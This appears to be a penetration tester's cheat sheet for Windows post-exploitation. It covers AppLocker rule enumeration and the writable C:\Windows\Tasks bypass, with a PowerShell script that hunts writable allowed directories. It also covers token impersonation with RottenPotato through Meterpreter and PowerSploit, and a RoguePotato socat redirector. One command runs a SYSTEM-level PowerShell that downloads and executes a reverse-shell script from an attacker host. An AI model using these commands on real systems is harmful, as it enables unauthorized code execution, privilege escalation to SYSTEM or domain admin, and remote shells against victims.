AppLocker
GPO
HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (subkeys: Appx, Dll, Exe, Msi and Script). The key is readable by standard users, so the rule XML can be read straight from the registry even without the AppLocker module.
List AppLocker rules
Get-AppLockerPolicy is part of the built-in AppLocker PowerShell module (not PowerView); -Effective returns the merged local + domain GPO policy on this host.
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
AppLocker bypass
With the default rules, everything under C:\Windows (%WINDIR%\*) is allowed to run, and C:\Windows\Tasks is writable by any user. Dropping a payload there runs it under the default allow rule unless the admin added an exception for that directory.
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
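Added example, not from the original notes: this enumerates the effective AppLocker path rules with the built-in module and then checks which directories under the enabled Allow roots the current user can actually write to, which is exactly where the C:\Windows\Tasks style bypass lives. Function names, the depth limit and the environment-variable map are assumptions of this example; AppLocker's own expansion of %PROGRAMFILES% also covers Program Files (x86), which is not modelled here.

```powershell
# Added example (not from the original notes). Requires the built-in AppLocker
# module (Get-AppLockerPolicy). Function names and the %VAR% map are this
# example's own assumptions.

function Get-AppLockerPathRules {
    # Expand the AppLocker path variables the way the engine does (simplified:
    # %PROGRAMFILES% also means "Program Files (x86)" in real AppLocker).
    $map = @{
        '%WINDIR%'       = $env:SystemRoot
        '%SYSTEM32%'     = "$env:SystemRoot\System32"
        '%PROGRAMFILES%' = $env:ProgramFiles
        '%OSDRIVE%'      = $env:SystemDrive
    }
    $policy = Get-AppLockerPolicy -Effective
    foreach ($collection in $policy.RuleCollections) {
        foreach ($rule in $collection) {
            # Publisher and hash rules carry no path; only path rules matter here.
            if (-not $rule.PathConditions) { continue }
            foreach ($cond in $rule.PathConditions) {
                $path = $cond.Path
                foreach ($k in $map.Keys) {
                    $path = $path -replace [regex]::Escape($k), $map[$k]
                }
                [pscustomobject]@{
                    Collection = $collection.RuleCollectionType   # Exe, Dll, Script, Msi, Appx
                    Mode       = $collection.EnforcementMode      # Enabled / AuditOnly / NotConfigured
                    Action     = $rule.Action                     # Allow / Deny
                    Sid        = $rule.UserOrGroupSid
                    Path       = $path
                }
            }
        }
    }
}

function Test-WritableDirectory {
    param([Parameter(Mandatory)][string]$Path)
    # Ground truth beats ACL parsing: create and delete an empty probe file.
    # Note this touches disk, so it is not a silent check.
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        $true
    } catch {
        $false
    }
}

function Find-AppLockerWritableDirs {
    param([int]$Depth = 2)   # how deep to walk under each allowed root
    # Only Allow rules in collections that are actually enforced (not AuditOnly)
    # and whose path ends in "\*" (a directory tree, e.g. %WINDIR%\*).
    $roots = Get-AppLockerPathRules |
        Where-Object { $_.Action -eq 'Allow' -and $_.Mode -eq 'Enabled' -and $_.Path -match '\\\*$' } |
        ForEach-Object { $_.Path -replace '\\\*$', '' } |
        Sort-Object -Unique
    foreach ($root in $roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        $dirs = @(Get-Item -LiteralPath $root) +
                @(Get-ChildItem -LiteralPath $root -Directory -Recurse -Depth $Depth -ErrorAction SilentlyContinue)
        foreach ($d in $dirs) {
            if (Test-WritableDirectory -Path $d.FullName) {
                [pscustomobject]@{ AllowRoot = $root; WritableDir = $d.FullName }
            }
        }
    }
}

# Usage: on a default-rules host this lists C:\Windows\Tasks among others.
Find-AppLockerWritableDirs | Format-Table -AutoSize
```

The walk ignores rule exceptions, so a directory it reports may still be blocked if the admin carved it out of the Allow rule. Confirm a candidate before relying on it with the module's own evaluator, e.g. Test-AppLockerPolicy -PolicyObject (Get-AppLockerPolicy -Effective) -Path 'C:\Windows\Tasks\x.exe' -User Everyone.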
RottenPotato
Precondition: the current token needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for service accounts such as IIS and MSSQL); the getprivs step below confirms it.
https://github.com/foxglovesec/RottenPotato
https://github.com/breenmachine/RottenPotatoNG
Meterpreter>getuid
Meterpreter>getprivs
Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>upload /root/Desktop/rottenpotato.exe
Meterpreter>execute -HC -f rottenpotato.exe
Meterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"
PowerSploit Invoke-TokenManipulation:
PS >Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
PS >Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
PS >Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c `"IEX (New-Object Net.WebClient).DownloadString('http://attackerip/Invoke-PowerShellTcp.ps1')`""
RoguePotato
https://github.com/antonioCoco/RoguePotato
The port redirector on the attacker machine must listen on TCP 135: the victim's DCOM activation resolves the OXID against "attacker:135" and RoguePotato cannot serve its fake OXID resolver on a non-135 port locally, so socat forwards the connection back to RoguePotato's listener on the victim (9999 by default). <VICTIM_IP> below is a placeholder for the victim's address.
socat tcp-listen:135,reuseaddr,fork tcp:<VICTIM_IP>:9999